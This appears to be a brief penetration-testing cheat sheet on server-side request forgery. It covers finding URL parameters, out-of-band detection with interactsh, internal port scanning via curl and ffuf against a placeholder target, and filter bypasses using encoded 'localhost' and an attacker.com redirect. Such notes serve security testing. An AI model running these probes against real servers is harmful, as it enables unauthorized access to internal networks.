SSRF

Server-side request forgery

Enumeration
  • Look for parameters that accept URLs.

  • Test in forms, webhooks, or file uploads.

  • Test with http://localhost or http://127.0.0.1.

Use Interactsh to detect out-of-band (OOB) interactions:

interactsh-client

Internal Port Scanning

Test for internal port access
curl "https://target.com/ssrf?url=http://localhost:22" -v
  • Use time-based delays or OOB techniques to detect open ports.

  • Check if response is slower for open ports.

ffuf -w ports.txt -u https://target.com/ssrf?url=http://localhost:FUZZ -mc 200 -t 10
Bypass Filters
URL encoding: http://127.0.0.1
http://%6c%6f%63%61%6c%68%6f%73%74
Domain redirection:
http://attacker.com/redirect?target=localhost

Last updated